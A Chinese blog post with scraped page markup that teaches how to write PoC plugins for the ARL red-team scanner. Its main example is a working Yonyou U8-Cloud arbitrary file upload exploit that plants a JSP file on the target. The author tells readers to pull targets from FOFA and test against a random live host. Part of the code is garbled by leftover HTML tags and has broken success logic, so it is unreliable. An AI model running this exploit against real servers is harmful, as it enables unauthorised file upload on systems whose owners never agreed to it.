arl-高级红队助手

2023年了,外边的代码还是那么的飘逸…各家的poc是各家的poc…为了统一规范,花了一点时间写了下arl的poc,抛砖引玉,希望各位师傅能一起来开发poc

POC相关

灯塔的POC有点少添加一下,找到POC的添加,然后进入!

docker exec  -it 407edbf4b35b /bin/bash

这里直接找POC的所在位置,官方已经给出相关说明

https://github.com/1c3z/ARL-NPoC

进去之后来到/opt/ARL-NPoC

cd /opt/ARL-NPoC && ls

新建终端,然后使用docker cp 将这个ARL-NPoC,拉到根目录

docker cp 407edbf4b35b:/opt/ARL-NPoC /

下载到本地,进行分析。把里面的环境装一下(要有python环境)

pip install -r requirements.txt

使用vscode打开

arl-高级红队助手_第1张图片

看POC的,没注释,让GPT生成注释即可

各个函数的意义

__init()__:初始化函数。
复制成功

def __init__(self):
    super(Plugin, self).__init__()
    # 插件类型poc
    self.plugin_type = PluginType.POC
    # 插件name
    self.vul_name = "泛微 Ecology getdata.jsp SQL注入漏洞"
    # 探测组件name
    self.app_name = 'Ecology'
    # 探测协议?
    self.scheme = [SchemeType.HTTP, SchemeType.HTTPS]

verify():验证函数。

def verify(self, target):   #参数target


http_req():请求函数。

def http_req(url, method = 'get', **kwargs): #传入url,请求方法get,post....


post请求实例:

http_req(url, method='post', data=data)
http_req(url, method='post', data=data, headers=header)



http_req()处理方法

1. content(): # 获取响应包
conn = http_req(url, "get")

if b"GitLab" not in conn.content:
      return False

2. json(): # json处理响应包

conn = http_req(url, "get")
data = conn.json()

3. status_code: #获取响应值

conn = http_req(url, "get", auth=(user, passwd))
if conn.status_code == 200:
     return True
conn = http_req(url)

4. text: #获取响应体。和content类似吧

conn = http_req(url, "get")
pattern = r''
matches = re.findall(pattern=pattern, string=conn.text)

5. headers.get() # 获取响应头

conn = http_req(url, "get")

if self._check_str not in conn.headers.get("WWW-Authenticate", ""):
       return False

6.self.logger.debug() #信息回显

self.logger.debug("not Ecology {}".format(target))


def init_logger():
    log_colors = {
        'DEBUG': 'white',
        'INFO': 'green',
        'SUCCESS':  'red',
        'WARNING': 'yellow',
        'ERROR': 'red',
        'CRITICAL': 'bold_red',
    }
    

 

后续代码编写可能会有问题,可以在本地简单测试保证不爆红之后再同步到远程arl。

pip install -e .      # 安装依赖
python setup.py --help-commands  # 查看安装命令帮助
python setup.py install       # 安装

arl-高级红队助手_第2张图片

arl-高级红队助手_第3张图片

提示帮助的同时也会加载编写好的插件,错误的插件会报错,此时就可以针对这些报错的插件做针对性修改。

xing -h

arl-高级红队助手_第4张图片

(经过测试,本地win没有办法加载poc,所以在linux上传测试,上述的测试环境搭建也要再做一次)

下边是用友-U8-Cloud-任意文件上传的poc演示

poc要多些,这个poc也是比较简单,arl已经内置相关写法,多看看demo的各种写法即可

有bug,在arl默认是https走,要加前缀,已经解决)

#app="用友-U8-Cloud"
# 导入必要的模块
from xing.core.BasePlugin import BasePlugin  # 导入BasePlugin类,用于创建插件基类
from xing.utils import http_req  # 导入http_req函数,用于发送HTTP请求
from xing.core import PluginType, SchemeType  # 导入PluginType和SchemeType枚举,用于指定插件类型和协议类型

# 定义Plugin类,继承自BasePlugin
class Plugin(BasePlugin):
    def __init__(self):
        super(Plugin, self).__init__()  # 调用父类的构造函数
        self.plugin_type = PluginType.POC  # 将插件类型设置为POC(Proof of Concept,概念验证)
        self.vul_name = "用友-U8-Cloud-任意文件上传"  # 定义漏洞名称
        self.app_name = 'U8'  # 将应用程序名称定义为 U8
        self.scheme = [SchemeType.HTTP]  # 指定支持的协议类型和HTTP

    # 定义用于检测漏洞的verify方法
    def verify(self, target):
        path = ["/linux/pages/upload.jsp"]  # 定义待检测的路径列表
        url = target + path[0]  # 构建完整的URL
        
        # 设置请求头
        header = {
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0",
            "Accept-Encoding": "gzip, deflate",
            "Accept": "*/*",
            "Connection": "close",
            "Content-Type": "application/x-www-form-urlencoded",
            "filename": "55051.jsp",
            "Content-Length": "30"
        }

        # 发送POST请求并获取响应
        data = '<% out.println(\"Console\"); %>'  # POST请求的数据


        #conn = requests.post(url, data=data, headers=header)
        conn = http_req(url, method='post', data=data, headers=header)
        
        content = conn.content  # 获取返回的内容

        # 发送GET请求并获取状态码
        conn1 = http_req(url + '/linux/55051.jsp')

        if conn.status_code != 404:  # 如果状态码不是404
            
            if (b"This page for response"</span> <span class="token keyword">not</span> <span class="token keyword">in</span> content <span class="token keyword">and</span> <span class="token string">b"upload success"</span> <span class="token keyword">not</span> <span class="token keyword">in</span> content<span class="token punctuation">)</span> <span class="token punctuation">:</span>  <span class="token comment"># 如果返回的内容不包含"<title>This page for response"或者"success file"</span>
                
                self<span class="token punctuation">.</span>logger<span class="token punctuation">.</span>success<span class="token punctuation">(</span><span class="token string">"not found U8-Cloud-upload file"</span><span class="token punctuation">)</span>  <span class="token comment"># 打印调试信息</span>

                <span class="token keyword">return</span> url  
                
            <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token string">b"<title>This page for response"</span> <span class="token keyword">in</span> content <span class="token keyword">or</span> <span class="token string">b"upload success"</span> <span class="token keyword">in</span> content<span class="token punctuation">)</span> <span class="token keyword">or</span> <span class="token punctuation">(</span>conn1<span class="token punctuation">.</span>status_code <span class="token operator">==</span> <span class="token number">200</span><span class="token punctuation">)</span><span class="token punctuation">:</span>  <span class="token comment"># 如果返回的内容包含指定的字符串</span>


                self<span class="token punctuation">.</span>logger<span class="token punctuation">.</span>success<span class="token punctuation">(</span><span class="token string">"用友U8-Cloud-upload {}"</span><span class="token punctuation">.</span><span class="token builtin">format</span><span class="token punctuation">(</span>target<span class="token operator">+</span><span class="token string">'/linux/55051.jsp'</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token comment"># 打印成功信息</span>

                <span class="token keyword">return</span> target<span class="token operator">+</span><span class="token string">'/linux/55051.jsp'</span>    
                <span class="token comment">#return必须写,作为风险巡航-漏扫-凭证会用到</span>
</code></pre> 
  <p><a href="http://img.e-com-net.com/image/info8/f7fedbfdff614337ada2af516a6e5a3f.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/f7fedbfdff614337ada2af516a6e5a3f.jpg" alt="arl-高级红队助手_第5张图片" width="650" height="341" style="border:1px solid black;"></a><br> )</p> 
  <p>目标从fofa找即可,关键字</p> 
  <pre><code>app="用友-U8-Cloud"
</code></pre> 
  <p>这里随便找一个进行测试</p> 
  <p></p> 
  <p>将测试好的poc上传到arl里</p> 
  <p></p> 
  <p>回到灯塔,查看poc</p> 
  <p><a href="http://img.e-com-net.com/image/info8/011cb335bbdd4cbe958ccc1652fcf6a8.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/011cb335bbdd4cbe958ccc1652fcf6a8.jpg" alt="arl-高级红队助手_第6张图片" width="650" height="332" style="border:1px solid black;"></a></p> 
  <p>POC测试</p> 
  <p>在策略配置上选中POC单个测试</p> 
  <p><a href="http://img.e-com-net.com/image/info8/37e86af18613493cb558279921b1834d.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/37e86af18613493cb558279921b1834d.jpg" alt="arl-高级红队助手_第7张图片" width="650" height="289" style="border:1px solid black;"></a></p> 
  <p>扫描主机,然后风险任务下发,选择poc</p> 
  <p>执行完毕后会看到凭证,就是上传文件的证明</p> 
 </div> 
</div>
                            </div>
                        </div>
                    </div>
                    <!--PC和WAP自适应版-->
                    <div id="SOHUCS" sid="1905458929110937600"></div>
                    <script type="text/javascript" src="/views/front/js/chanyan.js"></script>
                    <!-- 文章页-底部 动态广告位 -->
                    <div class="youdao-fixed-ad" id="detail_ad_bottom"></div>
                </div>
                <div class="col-md-3">
                    <div class="row" id="ad">
                        <!-- 文章页-右侧1 动态广告位 -->
                        <div id="right-1" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad">
                            <div class="youdao-fixed-ad" id="detail_ad_1"> </div>
                        </div>
                        <!-- 文章页-右侧2 动态广告位 -->
                        <div id="right-2" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad">
                            <div class="youdao-fixed-ad" id="detail_ad_2"></div>
                        </div>
                        <!-- 文章页-右侧3 动态广告位 -->
                        <div id="right-3" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad">
                            <div class="youdao-fixed-ad" id="detail_ad_3"></div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <div class="container">
        <h4 class="pt20 mb15 mt0 border-top">你可能感兴趣的:(学习历程,web安全)</h4>
        <div id="paradigm-article-related">
            <div class="recommend-post mb30">
                <ul class="widget-links">
                    <li><a href="/article/1939160977115246592.htm"
                           title="【安全建设 | 从0到1】企业安全体系建设线路" target="_blank">【安全建设 | 从0到1】企业安全体系建设线路</a>
                        <span class="text-muted">秋说</span>
<a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a>
                        <div>文章目录一、安全体系建设v1.0——快速治理1.1安全风险初现1.2配置合适的安全负责人1.3识别主要风险点1.4快速风险削减策略Web安全治理(按优先级)业务风控治理移动安全治理员工行为安全治理口令安全治理钓鱼与社工防御合规治理二、安全体系建设v2.0——系统化建设2.1基于ISMS建设信息安全管理体系2.2基于BSIMM构建安全开发工程能力BSIMM简介常见问题应对2.3构建可复用的技术安全架</div>
                    </li>
                    <li><a href="/article/1938859372566343680.htm"
                           title="如何在FastAPI中打造坚不可摧的Web安全防线?" target="_blank">如何在FastAPI中打造坚不可摧的Web安全防线?</a>
                        <span class="text-muted"></span>

                        <div>url:/posts/9d6200ae7ce0a1a1a523591e3d65a82e/title:如何在FastAPI中打造坚不可摧的Web安全防线?date:2025-06-28T08:37:03+08:00lastmod:2025-06-28T08:37:03+08:00author:cmdragonsummary:Web安全三要素包括机密性、完整性和可用性。机密性通过加密算法保护数据传输和</div>
                    </li>
                    <li><a href="/article/1938517366061199360.htm"
                           title="深入理解CSRF攻击与防护机制" target="_blank">深入理解CSRF攻击与防护机制</a>
                        <span class="text-muted">布兰妮甜</span>
<a class="tag" taget="_blank" href="/search/javascript/1.htm">javascript</a><a class="tag" taget="_blank" href="/search/csrf/1.htm">csrf</a><a class="tag" taget="_blank" href="/search/%E9%98%B2%E6%8A%A4%E6%9C%BA%E5%88%B6/1.htm">防护机制</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a>
                        <div>Hi,我是布兰妮甜!在当今高度互联的Web应用环境中,安全威胁无处不在。CSRF(跨站请求伪造)作为一种常见的Web安全漏洞,长期位居OWASPTop10安全威胁榜单。这种攻击方式利用了网站对用户浏览器的信任,可能导致用户在不知情的情况下执行非预期的操作,如资金转账、密码更改等。本文将深入剖析CSRF攻击原理,详细介绍多种有效的防护机制,并提供实用的JavaScript代码示例,帮助开发者构建更加</div>
                    </li>
                    <li><a href="/article/1938455604439871488.htm"
                           title="构建一个AI驱动的SQL注入测试系统" target="_blank">构建一个AI驱动的SQL注入测试系统</a>
                        <span class="text-muted"></span>

                        <div>一、引言在当今这个高度数字化的时代,数据已成为组织最宝贵的资产之一。无论是互联网平台、电商系统,还是企业内部信息化系统,其背后都离不开数据库支撑。数据库的安全性,直接关乎企业的数据完整性、隐私合规性乃至品牌信誉。而SQL注入(SQLInjection)作为最经典、最普遍的Web安全漏洞之一,至今仍是黑客攻击的主力武器之一。尽管业界已提出各种手段来预防SQL注入,如参数化查询、ORM封装、Web应用</div>
                    </li>
                    <li><a href="/article/1938450810807578624.htm"
                           title="Linux网络编程(四)——学习历程 多路IO之epoll" target="_blank">Linux网络编程(四)——学习历程 多路IO之epoll</a>
                        <span class="text-muted"></span>

                        <div>1.epoll如果内存1G,epoll就支持10w连接不能跨平台,只能在Linux中使用支持的并发量很大的I/O多路转接函数select支持跨平台在window平台中:select的第一个参数是没有意义的,写0就可以了在linux平台中:select的第一个参数是检测集合中最大文件描述符+1检测最大连接数:最大为1024检测方式和效率:线性检测,文件符越多,效率越低使用select检测集合会进行多</div>
                    </li>
                    <li><a href="/article/1937903540588572672.htm"
                           title="React 19 的 useActionState 如何防御 CSRF 攻击" target="_blank">React 19 的 useActionState 如何防御 CSRF 攻击</a>
                        <span class="text-muted">前端布洛芬</span>
<a class="tag" taget="_blank" href="/search/%E5%A4%A7%E7%99%BD%E8%AF%9D%E5%89%8D%E7%AB%AF%E5%85%AB%E8%82%A1/1.htm">大白话前端八股</a><a class="tag" taget="_blank" href="/search/react.js/1.htm">react.js</a><a class="tag" taget="_blank" href="/search/csrf/1.htm">csrf</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a>
                        <div>大白话React19的useActionState如何防御CSRF攻击在前端开发的“修罗场”里,每一个前端工程师都在与需求变更、性能优化、兼容性问题“斗智斗勇”,而安全问题更是悬在头顶的“达摩克利斯之剑”。尤其是CSRF(跨站请求伪造)攻击,作为Web安全领域的“常客”,让不少开发者头疼不已。好在React19带来了useActionState这个“秘密武器”,今天就带大家一探究竟,看看它是如何筑</div>
                    </li>
                    <li><a href="/article/1937579642403745792.htm"
                           title="网络安全项目实战:Python在网络安全中的应用" target="_blank">网络安全项目实战:Python在网络安全中的应用</a>
                        <span class="text-muted">kleo3270</span>

                        <div>本文还有配套的精品资源,点击获取简介:网络安全项目工程是一个用Python编写的程序,重点在于实现特定的安全功能或进行网络安全性分析。本项目详细解析了如何使用Python执行特定命令以实现网络安全性,涵盖了网络编程、加密、数据分析、Web安全、认证授权、异常检测等技术。同时,还涉及到网络扫描、渗透测试以及入侵检测系统,使用Python库进行各种网络安全操作。1.Python在网络安全中的应用概述网</div>
                    </li>
                    <li><a href="/article/1937129312515846144.htm"
                           title="华为内部的Web安全原则笔记" target="_blank">华为内部的Web安全原则笔记</a>
                        <span class="text-muted"></span>

                        <div>Web安全原则1.认证模块必须采用防暴力破解机制,例如:验证码或者多次连续尝试登录失败后锁定帐号或IP。说明:如采用多次连续尝试登录失败后锁定帐号或IP的方式,需支持连续登录失败锁定策略的“允许连续失败的次数”可配置,支持在锁定时间超时后自动解锁。2.对于每一个需要授权访问的页面或servlet的请求都必须核实用户的会话标识是否合法、用户是否被授权执行这个操作,以防止URL越权。说明:防止用户通过</div>
                    </li>
                    <li><a href="/article/1936070164911026176.htm"
                           title="WEB安全--CSRF&SSRF" target="_blank">WEB安全--CSRF&SSRF</a>
                        <span class="text-muted">Neur0toxin</span>
<a class="tag" taget="_blank" href="/search/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/1.htm">内网渗透</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/csrf/1.htm">csrf</a><a class="tag" taget="_blank" href="/search/ssrf/1.htm">ssrf</a>
                        <div>一、CSRF1.1、原理跨站点请求伪造---攻击者诱导用户在已认证的web应用中执行非法操作,通过构造虚假的网页并在该网页中植入危险脚本,受害者在不知情的情况下进入该网页,网页就会盗用受害者浏览器中的session或cookie执行危险命令,可以你的名义发送邮件,发消息,盗用你的账号,甚至于购买商品,虚拟货币转账等。1.2、防御手段1、验证HTTPReferer字段(可绕过)2、请求地址中添加to</div>
                    </li>
                    <li><a href="/article/1935951922947223552.htm"
                           title="Web安全性测试--超详细用例CASE整理总结" target="_blank">Web安全性测试--超详细用例CASE整理总结</a>
                        <span class="text-muted">寻觅神话06</span>
<a class="tag" taget="_blank" href="/search/%E4%B8%93%E9%A1%B9%E6%B5%8B%E8%AF%95/1.htm">专项测试</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8%E6%80%A7%E6%B5%8B%E8%AF%95/1.htm">安全性测试</a><a class="tag" taget="_blank" href="/search/%E6%BC%8F%E6%89%AB/1.htm">漏扫</a>
                        <div>一、漏洞扫描1.1等保要求要求:等保2.0《GB/736627-2018信息安全技术网络安全等级保护测试评估技术指南》中5.2.3漏洞扫描章节基本要求入侵防御章节1.2要求内容漏洞扫描的主要功能是针对主机和开放端口识别已知漏洞、提供建议降低漏洞风险;同时,有助于识别过时的软件版本、缺失的补丁和错误配置,并验证其与机构安全策略的一致性。进行漏洞扫描时,可考虑以下评估要素和评估原则:a)识别漏洞相关信</div>
                    </li>
                    <li><a href="/article/1935656506007547904.htm"
                           title="我的创作纪念日" target="_blank">我的创作纪念日</a>
                        <span class="text-muted">盛夏绽放</span>
<a class="tag" taget="_blank" href="/search/%E7%BA%AA%E5%BF%B5/1.htm">纪念</a>
                        <div>我的创作之旅:从编程新手到技术分享者机缘最初成为创作者,源于我在学习编程过程中的几个简单愿望:记录学习历程:刚开始学习JavaScript时,经常遇到各种问题,希望能记录下解决过程项目经验沉淀:完成学校项目后,想总结其中的技术难点和解决方案技术交流渴望:看到社区中大家的热烈讨论,也想加入其中分享自己的见解帮助后来者:自己曾被优秀的教程帮助过,希望也能帮助其他初学者收获在创作过程中,我获得了许多意外</div>
                    </li>
                    <li><a href="/article/1935274004227092480.htm"
                           title="【漏洞挖掘】——75、任意文件读取攻防原理" target="_blank">【漏洞挖掘】——75、任意文件读取攻防原理</a>
                        <span class="text-muted">FLy_鹏程万里</span>
<a class="tag" taget="_blank" href="/search/%E3%80%90WEB%E6%B8%97%E9%80%8F%E3%80%91/1.htm">【WEB渗透】</a><a class="tag" taget="_blank" href="/search/android/1.htm">android</a><a class="tag" taget="_blank" href="/search/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E2%80%98/1.htm">渗透测试‘</a><a class="tag" taget="_blank" href="/search/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/1.htm">信息安全</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/Web%E6%B8%97%E9%80%8F/1.htm">Web渗透</a>
                        <div>漏洞简介在web安全中任意文件读取漏洞是非常常见的一种漏洞,属于文件操作类漏洞,一般常见于PHP/java/python语言中,任意文件读取漏洞,顾名思义就是可以任意读取服务器上部分或者全部文件的漏洞,攻击者利用此漏洞可以读取服务器敏感文件如/etc/passwd,/etc/sadow,web.config等,漏洞一般存在于文件下载参数,文件包含参数,主要是由于程序对传入的文件名或者文件路径没有经</div>
                    </li>
                    <li><a href="/article/1934846504648896512.htm"
                           title="[ deepseek 指令篇章 ]300个领域和赛道喂饭级deepseek指令" target="_blank">[ deepseek 指令篇章 ]300个领域和赛道喂饭级deepseek指令</a>
                        <span class="text-muted">寒蝉听雨[原ID_PowerShell]</span>
<a class="tag" taget="_blank" href="/search/AI%E5%B7%A5%E5%85%B7%E7%AE%B1/1.htm">AI工具箱</a><a class="tag" taget="_blank" href="/search/deepseek%E6%8F%90%E7%A4%BA%E8%AF%8D/1.htm">deepseek提示词</a><a class="tag" taget="_blank" href="/search/deepseek%E6%8C%87%E4%BB%A4/1.htm">deepseek指令</a><a class="tag" taget="_blank" href="/search/deepseek%E5%85%A5%E9%97%A8%E6%95%99%E5%AD%A6/1.htm">deepseek入门教学</a><a class="tag" taget="_blank" href="/search/deepseek%E6%8C%87%E4%BB%A4%E9%9B%86/1.htm">deepseek指令集</a><a class="tag" taget="_blank" href="/search/deepseek%E9%AB%98%E9%98%B6%E4%BD%BF%E7%94%A8/1.htm">deepseek高阶使用</a>
                        <div>博主介绍‍博主介绍:大家好,我是_PowerShell,很高兴认识大家~✨主攻领域:【渗透领域】【数据通信】【通讯安全】【web安全】【面试分析】点赞➕评论➕收藏==养成习惯(一键三连)欢迎关注一起学习一起讨论⭐️一起进步文末有彩蛋作者水平有限,欢迎各位大佬指点,相互学习进步!很多小伙伴在问有没有deepseek常用的提示词指令,这里整理了三百个领域的提示词强烈建议收藏,有你们的领域和赛道吗?可在</div>
                    </li>
                    <li><a href="/article/1934608531265220608.htm"
                           title="现代Web安全实践:基于Token与Refresh Token的单点登录(SSO)实现" target="_blank">现代Web安全实践:基于Token与Refresh Token的单点登录(SSO)实现</a>
                        <span class="text-muted"></span>
<a class="tag" taget="_blank" href="/search/%E6%95%B0%E6%8D%AE%E5%BA%93%E6%95%B0%E6%8D%AE%E6%8C%96%E6%8E%98%E8%BF%90%E7%BB%B4/1.htm">数据库数据挖掘运维</a>
                        <div>在数字化转型加速的今天,单点登录(SSO)已成为企业身份管理的核心基础设施。袋鼠云UED团队在过去几年中,为金融、政务、医疗等领域的大型系统构建SSO解决方案。本文将分享基于Token的标准SSO实现,同时解密UED团队对于单点登录的安全实践方式。单点登录核心原理1、SSO的基本工作流程2、双Token机制的优势AccessToken:短期有效(通常1-2小时),减少泄露风险RefreshToke</div>
                    </li>
                    <li><a href="/article/1934540047307042816.htm"
                           title="深入解析XXE漏洞利用:Base64编码的PHP过滤器+回调回传攻击" target="_blank">深入解析XXE漏洞利用:Base64编码的PHP过滤器+回调回传攻击</a>
                        <span class="text-muted">Bruce_xiaowei</span>
<a class="tag" taget="_blank" href="/search/%E7%AC%94%E8%AE%B0/1.htm">笔记</a><a class="tag" taget="_blank" href="/search/%E6%80%BB%E7%BB%93%E7%BB%8F%E9%AA%8C/1.htm">总结经验</a><a class="tag" taget="_blank" href="/search/php/1.htm">php</a><a class="tag" taget="_blank" href="/search/%E5%BC%80%E5%8F%91%E8%AF%AD%E8%A8%80/1.htm">开发语言</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/CTF/1.htm">CTF</a><a class="tag" taget="_blank" href="/search/XXE/1.htm">XXE</a>
                        <div>深入解析XXE漏洞利用:Base64编码的PHP过滤器+回调回传攻击在网络安全和CTF实战中,XXE(XMLExternalEntity)漏洞因其独特的攻击方式和广泛的应用环境,成为Web安全学习的重要一环。今天,我们以一个高级且实用的XXE利用Payload为例,详细拆解其构造和原理,帮助你快速理解XXE远程文件读取的攻防关键。一、什么是XXE漏洞?XXE(XML外部实体注入)是指在XML解析过</div>
                    </li>
                    <li><a href="/article/1933159615072104448.htm"
                           title="Bugku-CTF-Web安全最佳刷题路线" target="_blank">Bugku-CTF-Web安全最佳刷题路线</a>
                        <span class="text-muted"></span>

                        <div>曾经的我也是CTF六项全能,Web安全,密码学,杂项,Pwn,逆向,安卓样样都会。明明感觉这样很酷,却为何还是沦为社畜。Bugku-CTF-Web安全最佳刷题路线,我已经整理好了,干就完了。尽管我们都是学了就忘,但是那又怎样,至少我们曾经会过:ailx10网络安全优秀回答者互联网行业安全攻防员去知乎咨询:ailx10难度系数1:刷题路线ailx10:Bugku-CTF-滑稽(查看源代码)ailx1</div>
                    </li>
                    <li><a href="/article/1931636494611574784.htm"
                           title="Web安全深度解析:源码泄漏与未授权访问漏洞全指南" target="_blank">Web安全深度解析:源码泄漏与未授权访问漏洞全指南</a>
                        <span class="text-muted">Bruce_xiaowei</span>
<a class="tag" taget="_blank" href="/search/%E7%AC%94%E8%AE%B0/1.htm">笔记</a><a class="tag" taget="_blank" href="/search/%E6%80%BB%E7%BB%93%E7%BB%8F%E9%AA%8C/1.htm">总结经验</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a>
                        <div>Web安全深度解析:源码泄漏与未授权访问漏洞全指南引言:不可忽视的Web安全"暗礁"在Web应用安全领域,源码泄漏和未授权访问漏洞如同海面下的暗礁,看似不起眼却足以让整艘"企业安全之船"触礁沉没。本文将从攻击者视角深度剖析这些高危漏洞的形成机制、利用手法,并提供企业级防护方案,帮助开发者和安全工程师构建更坚固的防御体系。一、源码泄漏漏洞:企业数字资产的"后门"1.1版本控制系统的"致命疏忽"1.1</div>
                    </li>
                    <li><a href="/article/1931544583334850560.htm"
                           title="编程精华资源(ITeye优秀专栏)大汇总" target="_blank">编程精华资源(ITeye优秀专栏)大汇总</a>
                        <span class="text-muted">不 想写代码的码农</span>
<a class="tag" taget="_blank" href="/search/%E6%AF%9B%E8%8D%89%E5%B1%8B/1.htm">毛草屋</a><a class="tag" taget="_blank" href="/search/%E5%AD%A6%E4%B9%A0%E8%B5%84%E6%96%99%E5%A4%A7%E6%B1%87%E6%80%BB/1.htm">学习资料大汇总</a>
                        <div>/***************************************http://www.iteye.com/magazines/130#565原著地址*/博客是记录学习历程、分享经验的最佳平台,多年以来,各路技术大牛在ITeye网站上产生了大量优质的技术文章,并将系列文章集结成专栏,以便读者能够更便捷、更系统地浏览学习,这些可称之为“编程精华资源”。为了便于读者更好地查阅,本文将IT</div>
                    </li>
                    <li><a href="/article/1931368333559525376.htm"
                           title="关于Web安全:8. Web 攻击流量分析与自动化" target="_blank">关于Web安全:8. Web 攻击流量分析与自动化</a>
                        <span class="text-muted">shenyan~</span>
<a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E8%87%AA%E5%8A%A8%E5%8C%96/1.htm">自动化</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C/1.htm">网络</a>
                        <div>一、BurpSuite基础与高级使用BurpSuite是一款中间人攻击代理工具,核心作用是在客户端(浏览器)与服务器之间“插一脚”,拦截一切HTTP/HTTPS流量,从而修改、重放、注入或自动化分析。它不仅是抓包工具,还是渗透测试平台,适合用来:做权限绕过做Web风险点利用做脚本注入调试做自动化攻击编排1.1BurpSuite基础模块详解1)Proxy(代理模块)——抓包与拦截的起点功能:拦截浏览</div>
                    </li>
                    <li><a href="/article/1931146977723084800.htm"
                           title="Web安全:XSS、CSRF等常见漏洞及防御措施" target="_blank">Web安全:XSS、CSRF等常见漏洞及防御措施</a>
                        <span class="text-muted">一小条咸鱼</span>
<a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a>
                        <div>Web安全:XSS、CSRF等常见漏洞及防御措施一、XSS(跨站脚本攻击)定义与原理XSS攻击指攻击者将恶意脚本(如JavaScript、HTML标签)注入到Web页面中,当用户访问该页面时,脚本在浏览器端执行,从而窃取用户信息、劫持会话或篡改页面内容。根据注入方式和持久性分为:存储型XSS:恶意脚本存储在服务器数据库(如评论、留言板),持久存在,每次用户访问时触发。反射型XSS:通过URL参数(</div>
                    </li>
                    <li><a href="/article/1930528101947731968.htm"
                           title="DEFCON 29 Pwn 题目《3FACTOOORX》深度分析与利用详解" target="_blank">DEFCON 29 Pwn 题目《3FACTOOORX》深度分析与利用详解</a>
                        <span class="text-muted">Alfadi联盟 萧瑶</span>
<a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a>
                        <div>1.题目概览(ChallengeOverview)挑战名称3FACTOOORX所属比赛DEFCON29CTFQuals(2021)分类Web/BrowserExtension/JavaScriptSecurity目标简介与技术亮点3FACTOOORX是一个结合了Web安全、浏览器扩展安全和JavaScript混淆技术的高级挑战。题目要求参赛者分析一个Chrome浏览器扩展,逆向其中的混淆JavaS</div>
                    </li>
                    <li><a href="/article/1930069627535159296.htm"
                           title="2024山东省职业院校技能大赛题库3" target="_blank">2024山东省职业院校技能大赛题库3</a>
                        <span class="text-muted">oo1yn</span>
<a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E6%94%BB%E5%87%BB%E6%A8%A1%E5%9E%8B/1.htm">网络攻击模型</a><a class="tag" taget="_blank" href="/search/%E8%AE%A1%E7%AE%97%E6%9C%BA%E7%BD%91%E7%BB%9C/1.htm">计算机网络</a>
                        <div>第十七届山东省职业院校技能大赛中职组“网络安全”赛项资源三一、竞赛阶段竞赛阶段任务阶段竞赛任务竞赛时间分值A模块A-1登录安全加固180分钟200分A-2Nginx安全策略A-3日志监控A-4中间件服务加固A-5本地安全策略A-6防火墙策略B模块B-1漏洞扫描与利用400分B-2Linux操作系统渗透测试B-3网络安全事件应急响应B-4网页绕过B-5Python后面模块利用B-6Web安全应用3B</div>
                    </li>
                    <li><a href="/article/1928696866166337536.htm"
                           title="[ AI工具库 ] 宝藏级 AI 工具合集" target="_blank">[ AI工具库 ] 宝藏级 AI 工具合集</a>
                        <span class="text-muted">寒蝉听雨[原ID_PowerShell]</span>
<a class="tag" taget="_blank" href="/search/AI%E5%B7%A5%E5%85%B7%E7%AE%B1/1.htm">AI工具箱</a><a class="tag" taget="_blank" href="/search/AI%E5%B7%A5%E5%85%B7%E9%9B%86%E5%90%88/1.htm">AI工具集合</a><a class="tag" taget="_blank" href="/search/%E5%AE%9D%E8%97%8F%E7%BA%A7AI%E5%B7%A5%E9%9B%86/1.htm">宝藏级AI工集</a><a class="tag" taget="_blank" href="/search/%E5%A5%BD%E7%94%A8%E7%9A%84AI%E5%B7%A5%E5%85%B7%E9%9B%86%E5%90%88/1.htm">好用的AI工具集合</a>
                        <div>博主介绍‍博主介绍:大家好,我是_PowerShell,很高兴认识大家~✨主攻领域:【渗透领域】【数据通信】【通讯安全】【web安全】【面试分析】点赞➕评论➕收藏==养成习惯(一键三连)欢迎关注一起学习一起讨论⭐️一起进步文末有彩蛋作者水平有限,欢迎各位大佬指点,相互学习进步![AI工具库]宝藏级AI工具合集文档下载地址:https://pan.baidu.com/s/1xjHN_89d2X1sx</div>
                    </li>
                    <li><a href="/article/1928573818759081984.htm"
                           title="WEB安全--SQL注入--bypass技巧2" target="_blank">WEB安全--SQL注入--bypass技巧2</a>
                        <span class="text-muted">Neur0toxin</span>
